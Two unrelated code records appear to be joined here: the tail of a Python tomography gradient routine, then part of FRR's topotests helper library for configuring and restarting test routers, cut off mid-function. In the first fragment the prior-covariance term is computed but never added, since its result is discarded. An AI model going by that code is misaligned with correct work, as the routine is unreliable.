dd /= (CdCt + 1e-15)
#get ray info
Na, Nt, Nd, _ ,Ns = rays.shape
# if Na < Nd:
# #parallelize over antennas
# gradient = np.sum(np.stack([do_gradient(rays[i,:,:,:,:], dd[i,:,:], K_ne, m_tci,
# sigma_m, Nkernel, size_cell) for i in range(Na)],axis=-1),axis=-1)
# else:
# #parallelize over directions
# gradient = np.sum(np.stack([do_gradient(rays[:,:,d,:,:], dd[:,:,d], K_ne, m_tci,
# sigma_m, Nkernel, size_cell) for d in range(Nd)],axis=-1),axis=-1)
#parallelize over directions
gradient = np.sum(np.stack([do_adjoint(rays[:,:,d,:,:], dd[:,:,d], K_ne, m_tci,
sigma_m, Nkernel, size_cell,i0) for d in range(Nd)],axis=-1),axis=-1)
gradient += m_tci.M
gradient -= m_prior
return gradient
def do_gradient(rays, dd, K_ne, m_tci, sigma_m, Nkernel, size_cell, i0):
'''Gradient of S is G^t.CdCt^-1.(g-dobs) + Cm^-1.(m - mprior)'''
adjoint = do_adjoint(rays, dd, K_ne, m_tci, sigma_m, Nkernel, size_cell, i0)
# Nkernel=0
# #print("Doing gradient")
# L_m = Nkernel*size_cell
# #if antennas parallelization Nt,Nd
# #if directions parallelization Na,Nd
# N1,N2,_,Ns = rays.shape
# m_shape = [N1,N2,m_tci.nx,m_tci.ny,m_tci.nz]
# grad = np.zeros([m_tci.nx,m_tci.ny,m_tci.nz],dtype=np.double)
#
# mask = np.zeros(m_shape, dtype=np.bool)
# #idx_min = np.ones(m_shape,dtype=np.int64)*Ns
# #idx_max = np.ones(m_shape,dtype=np.int64)*-1
# #nevec = np.zeros([N1,N2,Ns],dtype=np.double)
# #go through the mask
# j = 0
# while j < N1:
# k = 0
# while k < N2:
# x_ray = rays[j,k,0,:]
# y_ray = rays[j,k,1,:]
# z_ray = rays[j,k,2,:]
# s_ray = rays[j,k,3,:]
# idx = 0
# while idx < Ns:
# #nevec[j,k,idx] = K_ne*np.exp(m_tci.interp(x_ray[idx],y_ray[idx],z_ray[idx]))/1e16
# xi,yi,zi = bisection(m_tci.xvec,x_ray[idx]),bisection(m_tci.yvec,y_ray[idx]),bisection(m_tci.zvec,z_ray[idx])
# local_mask = (j,k,slice(max(0,xi - Nkernel), min(m_tci.nx - 1, xi + Nkernel + 1)),
# slice(max(0,yi - Nkernel) , min(m_tci.ny - 1,yi + Nkernel + 1)),
# slice(max(0, zi - Nkernel), min(m_tci.nz - 1, zi + Nkernel + 1)))
# mask[local_mask] = True
# shape = mask[local_mask].shape
## idx_max[local_mask] = np.max(np.stack([idx_max[local_mask],
## np.ones(shape,dtype=np.int64)*idx],axis=-1),axis=-1)
## #print(idx_max[local_mask])
## idx_min[local_mask] = np.min(np.stack([idx_min[local_mask],
## np.ones(shape,dtype=np.int64)*idx],axis=-1),axis=-1)
# idx += 1
# k += 1
# j += 1
#
# #Cm^-1 (m-mprior)
# dmpart = np.zeros([m_tci.nx,m_tci.ny,m_tci.nz],dtype=np.double)
# sum_mask = np.sum(np.sum(mask,axis=0),axis=0)#is there any ray in the cell at all?
# xi = 0
# while xi < m_tci.nx:
# yi = 0
# while yi < m_tci.ny:
# zi = 0
# while zi < m_tci.nz:
# if not sum_mask[xi,yi,zi]:
# zi += 1
# continue
# x,y,z = m_tci.xvec[xi],m_tci.yvec[yi],m_tci.zvec[zi]
# j = 0
# while j < N2:
# i = 0
# while i < N1:
# paircomp = 0.
# if mask[i,j,xi,yi,zi]:
# paircomp = 1.
# if mask[i0,j,xi,yi,zi]:
# paircomp -= 1.
# grad[xi,yi,zi] += dd[i,j]*paircomp*K_ne*np.exp(m_tci.interp(m_tci.xvec[xi],
# m_tci.yvec[yi],
# m_tci.zvec[zi]))/1e12
#
#
# i += 1
# j += 1
# zi += 1
# yi += 1
# xi += 1
# return grad
def compute_gradient_dask(rays, g, dobs, i0, K_ne, m_tci, m_prior, CdCt, sigma_m, Nkernel, size_cell, cov_obj=None):
L_m = Nkernel*size_cell
# #i not eq i0 mask
# mask = np.ones(rays.shape[0],dtype=np.bool)
# mask[i0] = False
# rays = rays[mask,:,:,:,:]
# g = g[mask,:,:]
# dobs = dobs[mask,:,:]
# CdCt = CdCt[mask,:,:]
#residuals
#g.shape, dobs.shape [Na,Nt,Nd]
dd = g - dobs
#weighted residuals
#Cd.shape [Na,Nt,Nd] i.e. diagonal
#CdCt^-1 = 1./CdCt
dd /= (CdCt + 1e-15)
#get ray info
Na, Nt, Nd, _ ,Ns = rays.shape
# if Na < Nd:
# #parallelize over antennas
# gradient = da.sum(da.stack([da.from_delayed(delayed(do_gradient)(rays[i,:,:,:,:], dd[i,:,:], K_ne, m_tci,
# sigma_m, Nkernel, size_cell),(m_tci.nx,m_tci.ny,m_tci.nz),dtype=np.double) for i in range(Na)],axis=-1),axis=-1)
# else:
# #parallelize over directions
# gradient = da.sum(da.stack([da.from_delayed(delayed(do_gradient)(rays[:,:,d,:,:], dd[:,:,d], K_ne, m_tci,
# sigma_m, Nkernel, size_cell),(m_tci.nx,m_tci.ny,m_tci.nz),dtype=np.double) for d in range(Nd)],axis=-1),axis=-1)
#parallelize over directions
gradient = da.sum(da.stack([da.from_delayed(delayed(do_gradient)(rays[:,:,d,:,:], dd[:,:,d], K_ne, m_tci,
sigma_m, Nkernel, size_cell, i0),(m_tci.nx,m_tci.ny,m_tci.nz),dtype=np.double) for d in range(Nd)],axis=-1),axis=-1)
gradient = gradient.compute(get=get)
if cov_obj is not None:
dm = m_tci.M - m_prior
gradient + cov_obj.contract(dm)
#gradient += m_tci.M
#gradient -= m_prior
return gradient
def compute_gradient(rays, g, dobs, i0, K_ne, m_tci, m_prior, CdCt, sigma_m, Nkernel, size_cell, cov_obj=None):
L_m = Nkernel*size_cell
# #i not eq i0 mask
# mask = np.ones(rays.shape[0],dtype=np.bool)
# mask[i0] = False
# rays = rays[mask,:,:,:,:]
# g = g[mask,:,:]
# dobs = dobs[mask,:,:]
# CdCt = CdCt[mask,:,:]
#residuals
#g.shape, dobs.shape [Na,Nt,Nd]
dd = g - dobs
#weighted residuals
#Cd.shape [Na,Nt,Nd] i.e. diagonal
#CdCt^-1 = 1./CdCt
dd /= (CdCt + 1e-15)
#get ray info
Na, Nt, Nd, _ ,Ns = rays.shape
# if Na < Nd:
# #parallelize over antennas
# gradient = np.sum(np.stack([do_gradient(rays[i,:,:,:,:], dd[i,:,:], K_ne, m_tci,
# sigma_m, Nkernel, size_cell) for i in range(Na)],axis=-1),axis=-1)
# else:
# #parallelize over directions
# gradient = np.sum(np.stack([do_gradient(rays[:,:,d,:,:], dd[:,:,d], K_ne, m_tci,
# sigma_m, Nkernel, size_cell) for d in range(Nd)],axis=-1),axis=-1)
#parallelize over directions
gradient = np.sum(np.stack([do_gradient(rays[:,:,d,:,:], dd[:,:,d], K_ne, m_tci,
sigma_m, Nkernel, size_cell,i0) for d in range(Nd)],axis=-1),axis=-1)
if cov_obj is not None:
dm = m_tci.M - m_prior
gradient + cov_obj.contract(dm)
#gradient += m_tci.M
#gradient -= m_prior
return gradient
| apache-2.0 | 3,531,586,930,173,808,000 | 40.457055 | 156 | 0.449173 | false |
freerangerouting/frr | tests/topotests/lib/common_config.py | 1 | 120562 | #
# Copyright (c) 2019 by VMware, Inc. ("VMware")
# Used Copyright (c) 2018 by Network Device Education Foundation, Inc.
# ("NetDEF") in this file.
#
# Permission to use, copy, modify, and/or distribute this software
# for any purpose with or without fee is hereby granted, provided
# that the above copyright notice and this permission notice appear
# in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND VMWARE DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL VMWARE BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY
# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
# OF THIS SOFTWARE.
#
from collections import OrderedDict
from datetime import datetime
from time import sleep
from copy import deepcopy
from subprocess import call
from subprocess import STDOUT as SUB_STDOUT
from subprocess import PIPE as SUB_PIPE
from subprocess import Popen
from functools import wraps
from re import search as re_search
from tempfile import mkdtemp
import StringIO
import os
import sys
import ConfigParser
import traceback
import socket
import ipaddress
from lib.topolog import logger, logger_config
from lib.topogen import TopoRouter, get_topogen
from lib.topotest import interface_set_status
FRRCFG_FILE = "frr_json.conf"
FRRCFG_BKUP_FILE = "frr_json_initial.conf"
ERROR_LIST = ["Malformed", "Failure", "Unknown", "Incomplete"]
ROUTER_LIST = []
####
CD = os.path.dirname(os.path.realpath(__file__))
PYTESTINI_PATH = os.path.join(CD, "../pytest.ini")
# Creating tmp dir with testsuite name to avoid conflict condition when
# multiple testsuites run together. All temporary files would be created
# in this dir and this dir would be removed once testsuite run is
# completed
LOGDIR = "/tmp/topotests/"
TMPDIR = None
# NOTE: to save execution logs to log file frrtest_log_dir must be configured
# in `pytest.ini`.
config = ConfigParser.ConfigParser()
config.read(PYTESTINI_PATH)
config_section = "topogen"
if config.has_option("topogen", "verbosity"):
loglevel = config.get("topogen", "verbosity")
loglevel = loglevel.upper()
else:
loglevel = "INFO"
if config.has_option("topogen", "frrtest_log_dir"):
frrtest_log_dir = config.get("topogen", "frrtest_log_dir")
time_stamp = datetime.time(datetime.now())
logfile_name = "frr_test_bgp_"
frrtest_log_file = frrtest_log_dir + logfile_name + str(time_stamp)
print("frrtest_log_file..", frrtest_log_file)
logger = logger_config.get_logger(
name="test_execution_logs", log_level=loglevel, target=frrtest_log_file
)
print("Logs will be sent to logfile: {}".format(frrtest_log_file))
if config.has_option("topogen", "show_router_config"):
show_router_config = config.get("topogen", "show_router_config")
else:
show_router_config = False
# env variable for setting what address type to test
ADDRESS_TYPES = os.environ.get("ADDRESS_TYPES")
# Saves sequence id numbers
SEQ_ID = {"prefix_lists": {}, "route_maps": {}}
def get_seq_id(obj_type, router, obj_name):
"""
Generates and saves sequence number in interval of 10
Parameters
----------
* `obj_type`: prefix_lists or route_maps
* `router`: router name
*` obj_name`: name of the prefix-list or route-map
Returns
--------
Sequence number generated
"""
router_data = SEQ_ID[obj_type].setdefault(router, {})
obj_data = router_data.setdefault(obj_name, {})
seq_id = obj_data.setdefault("seq_id", 0)
seq_id = int(seq_id) + 10
obj_data["seq_id"] = seq_id
return seq_id
def set_seq_id(obj_type, router, id, obj_name):
"""
Saves sequence number if not auto-generated and given by user
Parameters
----------
* `obj_type`: prefix_lists or route_maps
* `router`: router name
*` obj_name`: name of the prefix-list or route-map
"""
router_data = SEQ_ID[obj_type].setdefault(router, {})
obj_data = router_data.setdefault(obj_name, {})
seq_id = obj_data.setdefault("seq_id", 0)
seq_id = int(seq_id) + int(id)
obj_data["seq_id"] = seq_id
class InvalidCLIError(Exception):
"""Raise when the CLI command is wrong"""
pass
def run_frr_cmd(rnode, cmd, isjson=False):
"""
Execute frr show commands in priviledged mode
* `rnode`: router node on which commands needs to executed
* `cmd`: Command to be executed on frr
* `isjson`: If command is to get json data or not
:return str:
"""
if cmd:
ret_data = rnode.vtysh_cmd(cmd, isjson=isjson)
if True:
if isjson:
logger.debug(ret_data)
print_data = rnode.vtysh_cmd(cmd.rstrip("json"), isjson=False)
else:
print_data = ret_data
logger.info(
"Output for command [ %s] on router %s:\n%s",
cmd.rstrip("json"),
rnode.name,
print_data,
)
return ret_data
else:
raise InvalidCLIError("No actual cmd passed")
def apply_raw_config(tgen, input_dict):
"""
API to configure raw configuration on device. This can be used for any cli
which does has not been implemented in JSON.
Parameters
----------
* `tgen`: tgen onject
* `input_dict`: configuration that needs to be applied
Usage
-----
input_dict = {
"r2": {
"raw_config": [
"router bgp",
"no bgp update-group-split-horizon"
]
}
}
Returns
-------
True or errormsg
"""
result = True
for router_name in input_dict.keys():
config_cmd = input_dict[router_name]["raw_config"]
if not isinstance(config_cmd, list):
config_cmd = [config_cmd]
frr_cfg_file = "{}/{}/{}".format(TMPDIR, router_name, FRRCFG_FILE)
with open(frr_cfg_file, "w") as cfg:
for cmd in config_cmd:
cfg.write("{}\n".format(cmd))
result = load_config_to_router(tgen, router_name)
return result
def create_common_configuration(
tgen, router, data, config_type=None, build=False, load_config=True
):
"""
API to create object of class FRRConfig and also create frr_json.conf
file. It will create interface and common configurations and save it to
frr_json.conf and load to router
Parameters
----------
* `tgen`: tgen onject
* `data`: Congiguration data saved in a list.
* `router` : router id to be configured.
* `config_type` : Syntactic information while writing configuration. Should
be one of the value as mentioned in the config_map below.
* `build` : Only for initial setup phase this is set as True
Returns
-------
True or False
"""
TMPDIR = os.path.join(LOGDIR, tgen.modname)
fname = "{}/{}/{}".format(TMPDIR, router, FRRCFG_FILE)
config_map = OrderedDict(
{
"general_config": "! FRR General Config\n",
"interface_config": "! Interfaces Config\n",
"static_route": "! Static Route Config\n",
"prefix_list": "! Prefix List Config\n",
"bgp_community_list": "! Community List Config\n",
"route_maps": "! Route Maps Config\n",
"bgp": "! BGP Config\n",
"vrf": "! VRF Config\n",
}
)
if build:
mode = "a"
elif not load_config:
mode = "a"
else:
mode = "w"
try:
frr_cfg_fd = open(fname, mode)
if config_type:
frr_cfg_fd.write(config_map[config_type])
for line in data:
frr_cfg_fd.write("{} \n".format(str(line)))
frr_cfg_fd.write("\n")
except IOError as err:
logger.error(
"Unable to open FRR Config File. error(%s): %s" % (err.errno, err.strerror)
)
return False
finally:
frr_cfg_fd.close()
# If configuration applied from build, it will done at last
if not build and load_config:
load_config_to_router(tgen, router)
return True
def kill_router_daemons(tgen, router, daemons):
"""
Router's current config would be saved to /etc/frr/ for each deamon
and deamon would be killed forcefully using SIGKILL.
* `tgen` : topogen object
* `router`: Device under test
* `daemons`: list of daemons to be killed
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
try:
router_list = tgen.routers()
# Saving router config to /etc/frr, which will be loaded to router
# when it starts
router_list[router].vtysh_cmd("write memory")
# Kill Daemons
result = router_list[router].killDaemons(daemons)
if len(result) > 0:
assert "Errors found post shutdown - details follow:" == 0, result
return result
except Exception as e:
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
def start_router_daemons(tgen, router, daemons):
"""
Daemons defined by user would be started
* `tgen` : topogen object
* `router`: Device under test
* `daemons`: list of daemons to be killed
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
try:
router_list = tgen.routers()
# Start daemons
result = router_list[router].startDaemons(daemons)
return result
except Exception as e:
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return True
def kill_mininet_routers_process(tgen):
"""
Kill all mininet stale router' processes
* `tgen` : topogen object
"""
router_list = tgen.routers()
for rname, router in router_list.iteritems():
daemon_list = [
"zebra",
"ospfd",
"ospf6d",
"bgpd",
"ripd",
"ripngd",
"isisd",
"pimd",
"ldpd",
"staticd",
]
for daemon in daemon_list:
router.run("killall -9 {}".format(daemon))
def check_router_status(tgen):
"""
Check if all daemons are running for all routers in topology
* `tgen` : topogen object
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
try:
router_list = tgen.routers()
for router, rnode in router_list.iteritems():
result = rnode.check_router_running()
if result != "":
daemons = []
if "bgpd" in result:
daemons.append("bgpd")
if "zebra" in result:
daemons.append("zebra")
rnode.startDaemons(daemons)
except Exception as e:
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return True
def reset_config_on_routers(tgen, routerName=None):
"""
Resets configuration on routers to the snapshot created using input JSON
file. It replaces existing router configuration with FRRCFG_BKUP_FILE
Parameters
----------
* `tgen` : Topogen object
* `routerName` : router config is to be reset
"""
logger.debug("Entering API: reset_config_on_routers")
router_list = tgen.routers()
for rname in ROUTER_LIST:
if routerName and routerName != rname:
continue
router = router_list[rname]
logger.info("Configuring router %s to initial test configuration", rname)
cfg = router.run("vtysh -c 'show running'")
fname = "{}/{}/frr.sav".format(TMPDIR, rname)
dname = "{}/{}/delta.conf".format(TMPDIR, rname)
f = open(fname, "w")
for line in cfg.split("\n"):
line = line.strip()
if (
line == "Building configuration..."
or line == "Current configuration:"
or not line
):
continue
f.write(line)
f.write("\n")
f.close()
run_cfg_file = "{}/{}/frr.sav".format(TMPDIR, rname)
init_cfg_file = "{}/{}/frr_json_initial.conf".format(TMPDIR, rname)
command = "/usr/lib/frr/frr-reload.py --input {} --test {} > {}".format(
run_cfg_file, init_cfg_file, dname
)
result = call(command, shell=True, stderr=SUB_STDOUT, stdout=SUB_PIPE)
# Assert if command fail
if result > 0:
logger.error("Delta file creation failed. Command executed %s", command)
with open(run_cfg_file, "r") as fd:
logger.info(
"Running configuration saved in %s is:\n%s", run_cfg_file, fd.read()
)
with open(init_cfg_file, "r") as fd:
logger.info(
"Test configuration saved in %s is:\n%s", init_cfg_file, fd.read()
)
err_cmd = ["/usr/bin/vtysh", "-m", "-f", run_cfg_file]
result = Popen(err_cmd, stdout=SUB_PIPE, stderr=SUB_PIPE)
output = result.communicate()
for out_data in output:
temp_data = out_data.decode("utf-8").lower()
for out_err in ERROR_LIST:
if out_err.lower() in temp_data:
logger.error(
"Found errors while validating data in" " %s", run_cfg_file
)
raise InvalidCLIError(out_data)
raise InvalidCLIError("Unknown error in %s", output)
f = open(dname, "r")
delta = StringIO.StringIO()
delta.write("configure terminal\n")
t_delta = f.read()
# Don't disable debugs
check_debug = True
for line in t_delta.split("\n"):
line = line.strip()
if line == "Lines To Delete" or line == "===============" or not line:
continue
if line == "Lines To Add":
check_debug = False
continue
if line == "============" or not line:
continue
# Leave debugs and log output alone
if check_debug:
if "debug" in line or "log file" in line:
continue
delta.write(line)
delta.write("\n")
f.close()
delta.write("end\n")
output = router.vtysh_multicmd(delta.getvalue(), pretty_output=False)
delta.close()
delta = StringIO.StringIO()
cfg = router.run("vtysh -c 'show running'")
for line in cfg.split("\n"):
line = line.strip()
delta.write(line)
delta.write("\n")
# Router current configuration to log file or console if
# "show_router_config" is defined in "pytest.ini"
if show_router_config:
logger.info("Configuration on router {} after reset:".format(rname))
logger.info(delta.getvalue())
delta.close()
logger.debug("Exiting API: reset_config_on_routers")
return True
def load_config_to_router(tgen, routerName, save_bkup=False):
"""
Loads configuration on router from the file FRRCFG_FILE.
Parameters
----------
* `tgen` : Topogen object
* `routerName` : router for which configuration to be loaded
* `save_bkup` : If True, Saves snapshot of FRRCFG_FILE to FRRCFG_BKUP_FILE
"""
logger.debug("Entering API: load_config_to_router")
router_list = tgen.routers()
for rname in ROUTER_LIST:
if routerName and rname != routerName:
continue
router = router_list[rname]
try:
frr_cfg_file = "{}/{}/{}".format(TMPDIR, rname, FRRCFG_FILE)
frr_cfg_bkup = "{}/{}/{}".format(TMPDIR, rname, FRRCFG_BKUP_FILE)
with open(frr_cfg_file, "r+") as cfg:
data = cfg.read()
logger.info(
"Applying following configuration on router"
" {}:\n{}".format(rname, data)
)
if save_bkup:
with open(frr_cfg_bkup, "w") as bkup:
bkup.write(data)
output = router.vtysh_multicmd(data, pretty_output=False)
for out_err in ERROR_LIST:
if out_err.lower() in output.lower():
raise InvalidCLIError("%s" % output)
cfg.truncate(0)
except IOError as err:
errormsg = (
"Unable to open config File. error(%s):" " %s",
(err.errno, err.strerror),
)
return errormsg
# Router current configuration to log file or console if
# "show_router_config" is defined in "pytest.ini"
if show_router_config:
logger.info("New configuration for router {}:".format(rname))
new_config = router.run("vtysh -c 'show running'")
logger.info(new_config)
logger.debug("Exiting API: load_config_to_router")
return True
def get_frr_ipv6_linklocal(tgen, router, intf=None, vrf=None):
"""
API to get the link local ipv6 address of a perticular interface using
FRR command 'show interface'
* `tgen`: tgen onject
* `router` : router for which hightest interface should be
calculated
* `intf` : interface for which linklocal address needs to be taken
* `vrf` : VRF name
Usage
-----
linklocal = get_frr_ipv6_linklocal(tgen, router, "intf1", RED_A)
Returns
-------
1) array of interface names to link local ips.
"""
router_list = tgen.routers()
for rname, rnode in router_list.iteritems():
if rname != router:
continue
linklocal = []
if vrf:
cmd = "show interface vrf {}".format(vrf)
else:
cmd = "show interface"
ifaces = router_list[router].run('vtysh -c "{}"'.format(cmd))
# Fix newlines (make them all the same)
ifaces = ("\n".join(ifaces.splitlines()) + "\n").splitlines()
interface = None
ll_per_if_count = 0
for line in ifaces:
# Interface name
m = re_search("Interface ([a-zA-Z0-9-]+) is", line)
if m:
interface = m.group(1).split(" ")[0]
ll_per_if_count = 0
# Interface ip
m1 = re_search("inet6 (fe80[:a-fA-F0-9]+[\/0-9]+)", line)
if m1:
local = m1.group(1)
ll_per_if_count += 1
if ll_per_if_count > 1:
linklocal += [["%s-%s" % (interface, ll_per_if_count), local]]
else:
linklocal += [[interface, local]]
if linklocal:
if intf:
return [_linklocal[1] for _linklocal in linklocal if _linklocal[0] == intf][
0
].split("/")[0]
return linklocal
else:
errormsg = "Link local ip missing on router {}"
return errormsg
def generate_support_bundle():
"""
API to generate support bundle on any verification ste failure.
it runs a python utility, /usr/lib/frr/generate_support_bundle.py,
which basically runs defined CLIs and dumps the data to specified location
"""
tgen = get_topogen()
router_list = tgen.routers()
test_name = sys._getframe(2).f_code.co_name
TMPDIR = os.path.join(LOGDIR, tgen.modname)
for rname, rnode in router_list.iteritems():
logger.info("Generating support bundle for {}".format(rname))
rnode.run("mkdir -p /var/log/frr")
bundle_log = rnode.run("python2 /usr/lib/frr/generate_support_bundle.py")
logger.info(bundle_log)
dst_bundle = "{}/{}/support_bundles/{}".format(TMPDIR, rname, test_name)
src_bundle = "/var/log/frr"
rnode.run("rm -rf {}".format(dst_bundle))
rnode.run("mkdir -p {}".format(dst_bundle))
rnode.run("mv -f {}/* {}".format(src_bundle, dst_bundle))
return True
def start_topology(tgen):
"""
Starting topology, create tmp files which are loaded to routers
to start deamons and then start routers
* `tgen` : topogen object
"""
global TMPDIR, ROUTER_LIST
# Starting topology
tgen.start_topology()
# Starting deamons
router_list = tgen.routers()
ROUTER_LIST = sorted(
router_list.keys(), key=lambda x: int(re_search("\d+", x).group(0))
)
TMPDIR = os.path.join(LOGDIR, tgen.modname)
router_list = tgen.routers()
for rname in ROUTER_LIST:
router = router_list[rname]
# It will help in debugging the failures, will give more details on which
# specific kernel version tests are failing
linux_ver = router.run("uname -a")
logger.info("Logging platform related details: \n %s \n", linux_ver)
try:
os.chdir(TMPDIR)
# Creating router named dir and empty zebra.conf bgpd.conf files
# inside the current directory
if os.path.isdir("{}".format(rname)):
os.system("rm -rf {}".format(rname))
os.mkdir("{}".format(rname))
os.system("chmod -R go+rw {}".format(rname))
os.chdir("{}/{}".format(TMPDIR, rname))
os.system("touch zebra.conf bgpd.conf")
else:
os.mkdir("{}".format(rname))
os.system("chmod -R go+rw {}".format(rname))
os.chdir("{}/{}".format(TMPDIR, rname))
os.system("touch zebra.conf bgpd.conf")
except IOError as (errno, strerror):
logger.error("I/O error({0}): {1}".format(errno, strerror))
# Loading empty zebra.conf file to router, to start the zebra deamon
router.load_config(
TopoRouter.RD_ZEBRA, "{}/{}/zebra.conf".format(TMPDIR, rname)
)
# Loading empty bgpd.conf file to router, to start the bgp deamon
router.load_config(TopoRouter.RD_BGP, "{}/{}/bgpd.conf".format(TMPDIR, rname))
# Starting routers
logger.info("Starting all routers once topology is created")
tgen.start_router()
def stop_router(tgen, router):
"""
Router"s current config would be saved to /etc/frr/ for each deamon
and router and its deamons would be stopped.
* `tgen` : topogen object
* `router`: Device under test
"""
router_list = tgen.routers()
# Saving router config to /etc/frr, which will be loaded to router
# when it starts
router_list[router].vtysh_cmd("write memory")
# Stop router
router_list[router].stop()
def start_router(tgen, router):
"""
Router will started and config would be loaded from /etc/frr/ for each
deamon
* `tgen` : topogen object
* `router`: Device under test
"""
logger.debug("Entering lib API: start_router")
try:
router_list = tgen.routers()
# Router and its deamons would be started and config would
# be loaded to router for each deamon from /etc/frr
router_list[router].start()
# Waiting for router to come up
sleep(5)
except Exception as e:
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
logger.debug("Exiting lib API: start_router()")
return True
def number_to_row(routerName):
"""
Returns the number for the router.
Calculation based on name a0 = row 0, a1 = row 1, b2 = row 2, z23 = row 23
etc
"""
return int(routerName[1:])
def number_to_column(routerName):
"""
Returns the number for the router.
Calculation based on name a0 = columnn 0, a1 = column 0, b2= column 1,
z23 = column 26 etc
"""
return ord(routerName[0]) - 97
#############################################
# Common APIs, will be used by all protocols
#############################################
def create_vrf_cfg(tgen, topo, input_dict=None, build=False):
"""
Create vrf configuration for created topology. VRF
configuration is provided in input json file.
VRF config is done in Linux Kernel:
* Create VRF
* Attach interface to VRF
* Bring up VRF
Parameters
----------
* `tgen` : Topogen object
* `topo` : json file data
* `input_dict` : Input dict data, required when configuring
from testcase
* `build` : Only for initial setup phase this is set as True.
Usage
-----
input_dict={
"r3": {
"links": {
"r2-link1": {"ipv4": "auto", "ipv6": "auto", "vrf": "RED_A"},
"r2-link2": {"ipv4": "auto", "ipv6": "auto", "vrf": "RED_B"},
"r2-link3": {"ipv4": "auto", "ipv6": "auto", "vrf": "BLUE_A"},
"r2-link4": {"ipv4": "auto", "ipv6": "auto", "vrf": "BLUE_B"},
},
"vrfs":[
{
"name": "RED_A",
"id": "1"
},
{
"name": "RED_B",
"id": "2"
},
{
"name": "BLUE_A",
"id": "3",
"delete": True
},
{
"name": "BLUE_B",
"id": "4"
}
]
}
}
result = create_vrf_cfg(tgen, topo, input_dict)
Returns
-------
True or False
"""
result = True
if not input_dict:
input_dict = deepcopy(topo)
else:
input_dict = deepcopy(input_dict)
try:
for c_router, c_data in input_dict.iteritems():
rnode = tgen.routers()[c_router]
if "vrfs" in c_data:
for vrf in c_data["vrfs"]:
config_data = []
del_action = vrf.setdefault("delete", False)
name = vrf.setdefault("name", None)
table_id = vrf.setdefault("id", None)
vni = vrf.setdefault("vni", None)
del_vni = vrf.setdefault("no_vni", None)
if del_action:
# Kernel cmd- Add VRF and table
cmd = "ip link del {} type vrf table {}".format(
vrf["name"], vrf["id"]
)
logger.info("[DUT: %s]: Running kernel cmd [%s]", c_router, cmd)
rnode.run(cmd)
# Kernel cmd - Bring down VRF
cmd = "ip link set dev {} down".format(name)
logger.info("[DUT: %s]: Running kernel cmd [%s]", c_router, cmd)
rnode.run(cmd)
else:
if name and table_id:
# Kernel cmd- Add VRF and table
cmd = "ip link add {} type vrf table {}".format(
name, table_id
)
logger.info(
"[DUT: %s]: Running kernel cmd " "[%s]", c_router, cmd
)
rnode.run(cmd)
# Kernel cmd - Bring up VRF
cmd = "ip link set dev {} up".format(name)
logger.info(
"[DUT: %s]: Running kernel " "cmd [%s]", c_router, cmd
)
rnode.run(cmd)
if "links" in c_data:
for destRouterLink, data in sorted(
c_data["links"].iteritems()
):
# Loopback interfaces
if "type" in data and data["type"] == "loopback":
interface_name = destRouterLink
else:
interface_name = data["interface"]
if "vrf" in data:
vrf_list = data["vrf"]
if type(vrf_list) is not list:
vrf_list = [vrf_list]
for _vrf in vrf_list:
cmd = "ip link set {} master {}".format(
interface_name, _vrf
)
logger.info(
"[DUT: %s]: Running" " kernel cmd [%s]",
c_router,
cmd,
)
rnode.run(cmd)
if vni:
config_data.append("vrf {}".format(vrf["name"]))
cmd = "vni {}".format(vni)
config_data.append(cmd)
if del_vni:
config_data.append("vrf {}".format(vrf["name"]))
cmd = "no vni {}".format(del_vni)
config_data.append(cmd)
result = create_common_configuration(
tgen, c_router, config_data, "vrf", build=build
)
except InvalidCLIError:
# Traceback
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
return result
def create_interface_in_kernel(
tgen, dut, name, ip_addr, vrf=None, netmask=None, create=True
):
"""
Cretae interfaces in kernel for ipv4/ipv6
Config is done in Linux Kernel:
Parameters
----------
* `tgen` : Topogen object
* `dut` : Device for which interfaces to be added
* `name` : interface name
* `ip_addr` : ip address for interface
* `vrf` : VRF name, to which interface will be associated
* `netmask` : netmask value, default is None
* `create`: Create interface in kernel, if created then no need
to create
"""
rnode = tgen.routers()[dut]
if create:
cmd = "sudo ip link add name {} type dummy".format(name)
rnode.run(cmd)
addr_type = validate_ip_address(ip_addr)
if addr_type == "ipv4":
cmd = "ifconfig {} {} netmask {}".format(name, ip_addr, netmask)
else:
cmd = "ifconfig {} inet6 add {}/{}".format(name, ip_addr, netmask)
rnode.run(cmd)
if vrf:
cmd = "ip link set {} master {}".format(name, vrf)
rnode.run(cmd)
def shutdown_bringup_interface_in_kernel(tgen, dut, intf_name, ifaceaction=False):
"""
Cretae interfaces in kernel for ipv4/ipv6
Config is done in Linux Kernel:
Parameters
----------
* `tgen` : Topogen object
* `dut` : Device for which interfaces to be added
* `intf_name` : interface name
* `ifaceaction` : False to shutdown and True to bringup the
ineterface
"""
rnode = tgen.routers()[dut]
cmd = "ip link set dev"
if ifaceaction:
action = "up"
cmd = "{} {} {}".format(cmd, intf_name, action)
else:
action = "down"
cmd = "{} {} {}".format(cmd, intf_name, action)
logger.info("[DUT: %s]: Running command: %s", dut, cmd)
rnode.run(cmd)
def validate_ip_address(ip_address):
"""
Validates the type of ip address
Parameters
----------
* `ip_address`: IPv4/IPv6 address
Returns
-------
Type of address as string
"""
if "/" in ip_address:
ip_address = ip_address.split("/")[0]
v4 = True
v6 = True
try:
socket.inet_aton(ip_address)
except socket.error as error:
logger.debug("Not a valid IPv4 address")
v4 = False
else:
return "ipv4"
try:
socket.inet_pton(socket.AF_INET6, ip_address)
except socket.error as error:
